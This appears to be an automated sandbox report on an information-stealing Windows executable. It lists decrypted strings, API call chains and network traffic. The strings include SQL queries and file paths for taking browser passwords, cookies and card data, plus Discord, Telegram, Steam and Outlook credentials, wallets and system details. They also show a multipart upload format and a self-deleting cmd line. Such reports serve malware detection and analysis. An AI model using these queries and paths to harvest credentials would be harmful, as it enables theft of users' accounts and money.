Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: StrStrA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: StrCmpCW
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PathMatchSpecA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RmStartSession
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RmRegisterResources
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RmGetList
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RmEndSession
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_open
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_step
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_column_text
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_finalize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_close
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: encrypted_key
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PATH
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: NSS_Init
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: NSS_Shutdown
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PK11_Authenticate
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: C:\ProgramData\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: browser:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: profile:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: url:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: login:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: password:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Opera
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: OperaGX
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Network
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: cookies
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: .txt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: TRUE
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: FALSE
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: autofill
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: history
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: cc
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: name:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: month:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: year:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: card:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Cookies
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Login Data
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Web Data
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: History
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: logins.json
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: formSubmitURL
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: usernameField
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: encryptedUsername
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: encryptedPassword
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: guid
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: cookies.sqlite
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: formhistory.sqlite
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: places.sqlite
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: plugins
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Local Extension Settings
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Sync Extension Settings
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: IndexedDB
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Opera Stable
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Opera GX Stable
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CURRENT
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: chrome-extension_
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Local State
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: profiles.ini
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: chrome
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: opera
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: firefox
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: wallets
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ProductName
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: x32
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: x64
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ProcessorNameString
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DisplayName
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DisplayVersion
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Network Info:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - IP: IP?
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Country: ISO?
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: System Summary:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - HWID:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - OS:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Architecture:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - UserName:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Computer Name:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Local Time:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - UTC:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Language:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Keyboards:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Laptop:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Running Path:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - CPU:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Threads:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Cores:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - RAM:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - Display Resolution:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: - GPU:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: User Agents:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Installed Apps:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: All Users:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Current User:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Process List:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: system_info.txt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: freebl3.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: mozglue.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: msvcp140.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: nss3.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: softokn3.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: vcruntime140.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Temp\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: .exe
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: runas
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: open
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: /c start
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %DESKTOP%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %APPDATA%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %USERPROFILE%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %RECENT%
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: *.lnk
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: files
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \discord\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: key_datas
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: map*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Telegram
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Tox
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: *.tox
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: *.ini
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Password
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 00000001
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 00000002
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 00000003
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 00000004
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Pidgin
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \.purple\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: accounts.xml
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: token:
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SteamPath
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \config\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ssfn*
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: config.vdf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: loginusers.vdf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Steam\
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sqlite3.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: browsers
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: done
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: soft
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: https
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: POST
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HTTP/1.1
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: hwid
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: build
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: token
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: file_name
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: file
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: message
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_0040A2B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00419030
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_0040C920
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0040A210
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_004072A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE56C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CE56C80
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFCA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CFCA9A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFC44C0 PK11_PubEncrypt,	0_2_6CFC44C0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D0125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6D0125B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFC4440 PK11_PrivDecrypt,	0_2_6CFC4440
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF94420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CF94420
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFAE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CFAE6E0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Unpacked PE file: 0.2.HrxOpVxK5d.exe.400000.1.unpack

Source: HrxOpVxK5d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:52976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:53155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:53183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.7:49793 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: HrxOpVxK5d.exe, 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: my_library.pdb source: HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: HrxOpVxK5d.exe, 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
